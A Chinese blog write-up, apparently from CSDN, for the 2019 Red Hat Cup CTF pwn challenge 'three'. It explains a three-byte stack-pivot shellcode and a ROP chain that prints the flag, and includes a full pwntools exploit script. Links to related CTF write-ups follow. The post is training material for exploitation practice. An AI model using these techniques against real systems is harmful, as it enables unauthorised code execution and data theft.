2019 红帽杯 three 经验总结

最新推荐文章于 2024-05-06 11:15:21 发布
最新推荐文章于 2024-05-06 11:15:21 发布
阅读量1.3k 收藏 5
点赞数 2
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/103007871
版权

这题感觉要对汇编语言要比较熟悉会更容易做出来…

程序逻辑分析:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中
在这里插入图片描述
在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag

利用思路:
在这里插入图片描述
通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面输入的name的地址是从0x80f6cc0开始的, 那么可以考虑把栈迁移到bss段, 之后进行rop将flag读出来

具体步骤:

  1. 植入的三字节指令为
    mov esp, [ecx]; ret;
    完成栈迁移

2.完成栈迁移后需要考虑的是如何将flag读出
在这里插入图片描述
观察汇编代码发现, puts函数的参数放在寄存器eax中, 那么可以考虑将指向flag的地址存入eax中在利用puts输出

  1. 调试中发现
    0x80F6C80(bss) -> 0x5703440(heap) -> flag
    那么可以先利用pop eax 将0x80F6C80 存入 eax中
    之后 再执行 mov eax, [eax] 将指向flag的地址存入eax中, 最后再跳转到
    push eax
    call sub_80506F0
    调用puts函数将flag输出

不得不说学长强啊…

EXP:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context(os='linux',arch='i386', terminal = ['tmux', 'splitw', '-h'])

def rsl(c,s):
    r.recvuntil(c)
    r.sendline(s)

def rs(c,s):
    r.recvuntil(c)
    r.send(s)

def pwn(local, d, ip = 0, port = 0):
	global r
	if local == 0:
		r = process("./irpwn")
		if d == 1:
			gdb.attach(r)
	else:
		r = remote(ip, port)
	
	'''
	0x80C11E6: pop eax; ret;
	0x80A7EBB: mov eax, DWORD PTR [eax];ret;
	'''
	flag = p32(0x080F6CC4)+p32(0x080C11E6)+p32(0x80F6C80)+p32(0x080A7EBB)+p32(0x08048B82) + p64(0x080C11E6)

	payload =asm('mov esp,[ecx];ret')

	rsl("Give me a index:\n",str(0))

	rsl("Three is good number,I like it very much!\n",payload)
	rsl("Leave you name of size:\n", str(len(flag)))
	raw_input()
	rs("Tell me:\n", flag)
	r.recv(20)

	r.interactive()

if __name__ == '__main__':
	pwn(0, 1)

结果:
在这里插入图片描述

苍崎青子
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF Reverse/[2019红帽杯]xx
ookami6497的博客
11-28 540
BUUCTF Reverse/[2019红帽杯]xx 先看下文件信息:没有加壳、64位程序 看别人wp时候发现个好东东,就是这个findcrypt插件,可以看加密算法的,具体安装可以看这个IDA7.5安装findcrypt3插件 可以看到这是tea加密 ...
2019红帽杯恶臭的数据包.7z
11-11
2019红帽杯恶臭的数据包
红帽杯three
NoOneGroup
01-08 290
title: 红帽杯three tags: pwn 二进制 writeup 红帽杯 2019 categories: writeup abbrlink: 633c637e date: 2019-11-15 17:24:38 新博客链接 three 这道题我开始用了jmp ecx。。可能基础没打好吧,让我真正理解nx保护的就是这道了,为什么rop能绕过nx保护,因为rop利用的是ret一个地...
[2019红帽杯]childRE
最新发布
2302_79135465的博客
05-06 926
我传入的v14=“abcdefghijklmnopqrstuvwxyz12345”,第一次的时候它给name[0]赋值成了p,对应我输入的字符串的下标是15,我调试了多次,发现每次都是这样,而且最后的name里存放的是打乱了顺序的输入的字符串,动调它给name赋值的过程,记录下对应的下标。动态调试会发现,开辟的地址处有三个数据,第一个是我们输入的字符,第二个是左孩子的地址,第三个是右孩子的地址。输入长度31的字符串---进行置换运算---取消修饰函数名---将未修饰函数名的商和余数与字符串比较。
buuctf [2019红帽杯]easyRE
个人博客:http://s0rry.cn
12-12 684
有点小坑
BUUCTF逆向题[2019红帽杯]easyRE
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
10-23 934
*(&v15 + i) 有了前面的分析,这条语句就不难理解了,我们输入的字符串保存到 v51 中,然后取出每个字符与 i 值异或再与 v15 到 v50 的字符进行比较(&v15是首元素的地址,+i 表示指向下一个的意思)跟过来后可以发现是我们前面看到的与 base64 有关的东西,所以我们猜测 sub_400E44 是一个 base64 加密处理函数,由代码可知对同一个数据加密了 10 次,加密后的数据是什么,我们接着找。我们去看看,发现是看雪的一篇文章,到这里我们基本可以确定这是一个干扰项。
buu:[2019红帽杯]easyRE wp
weixin_60553183的博客
12-19 218
放入ida后我人懵了,这是我见过函数最多的一次。但是总归是要尝试的,打开strings window ok,这里可以看出两个东西一个是base 64一个是you find me!这意味着flag位置找到了。点进去交叉引用。 第一步是静态分析,然后呢,修改函数名,其实这一步我老是忽略,但其实很重要,可以帮助分析,且有效避免眼瞎。 首先sub_410cc00很容易看出是输出可以看成puts. 然后sub_4406E0(0LL, v15, 37LL),这个函数,第一个参数0,第二个参数,...
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
红帽RHCSA的详尽笔记
08-15
红帽RHCSA的详尽笔记打算要考RHCSA然后报了一个班,这是我自己记录的笔记,我感觉挺详细的,希望对你们有帮助,包括配置网卡、yum源、创建用户、用户组、创建cron作业等等,可以搭配我的文章一起看,对初学Linux和考...
[2019红帽杯]easyRE1题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-30 1651
buuctf-[2019红帽杯]easyRE1题解
[2019红帽杯]easyRE
weixin_52034946的博客
01-23 298
64位ida,7.0的,(最近用7.5老抽风,好多数据我都找不到) 查看字符串,发现三个特殊的字符 其中那个ABCD肯定是base64加密了,跟进去主要看一看这个函数名字,是sub_400E44 其他俩个跟进去就是主函数了. 分析主函数 sub_4406E0 这个代码基本上是看不懂的,但是可以注意到里面有一个sys_read ,可以猜测是读取字符串内容的 sub_424BA0,这个进去看内容其实我也看不懂,但是根据下面的for循环可以判断出,这个是读取字符串长度的,尤其是这一步可以判读这点 因为这是fo
BUUCTF [2019红帽杯]childRE
个人博客:http://s0rry.cn
12-26 2015
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
2019年第三届红帽杯线上赛wp
SkYe's Blog
11-16 1562
2019年第三届红帽杯线上赛wp PWN three IDA打开之后,函数名都是sub_xxx,然后通过nc官方部署的程序(或本地在程序所在目录创建flag文件后),获得程序中会出现的字符串定位到了重要函数,我用的是字符串Maybe is good。 贴出来一下重要函数对应的内存地址: 函数名(已重命名) 内存地址 main 0x08048CA8 load_flag 0x080...
第45天:红帽杯2019-childRE(一)
S1lenc3的博客
12-15 427
1.上午考四级,来年再战。 2.下午出去玩了,没学习。 3.放弃学习是不可能的,今天待在实验室了。 今天打算复现一下childRE,直接拖到IDA,代码好长,我好害怕。 搜索关键字符串定位函数。 三处Sleep,直接patch,推荐一个IDA的patch插件,之前的博客也提到过, 然后,这TM是啥。。。。对我这个菜鸡来说,只有自闭了。 这是STL,我压根不会。。。。 没办法...
[2019红帽杯]childRE 分析与拓展
Tokameine的博客
07-01 525
十分特殊也有趣的一题,特此记录。流程并非难以理解,但有些需要注意的点。 无壳,可以直接用IDA分析,但由于存在一些动态变量,一旦开始动调,代码将会变得更难理解,因此目前只用静态调试来审计 int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rax const CHAR *v5; // r11 __int64...
第15天:红帽杯2019-XX
S1lenc3的博客
11-14 1176
比赛的时候一道逆向没做出来,ezre还被耍了,也没做出来,这两天搞android,那个AndroidStudio给我整了一天,我哭了,今天复现一道题,一天就这么没了。。。。 XX这道题思路很清晰: 输入 取输入的前四个字符 进行XXTEA加密 通过置换box进行置换 3个为一组做循环异或 和明文比较 难点就是那个XXTEA加密,然后装了一个插件,FindCrypt ,百度有安装教程。...
第46天:红帽杯2019-childRE(二)
S1lenc3的博客
12-15 377
昨天说到处理完输入了,今天把这道题干掉了,一定要有耐心,慢慢调试。 把输入的三个数设为x,y,z。 断到这里, 注释都标注了,自己分析一下。 在这里,发现goto到label_47就直接到运行结束了,没有flag,所以就不让他跳转,就要满足x<z 类似的,也要满足y<x。继续单步,来到一堆计算的地方。 这里是计算位数的。 这都是一步一步分析的,没什么说...
虚拟机红帽Linux安装
10-08
虚拟机中安装红帽Linux可以按照以下步骤进行操作: 1. 首先,确保你已经安装了虚拟机软件,比如VMware Workstation或者Oracle VirtualBox。 2. 下载红帽Linux的ISO镜像文件,可以从红帽官网下载或者其他可信的来源...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值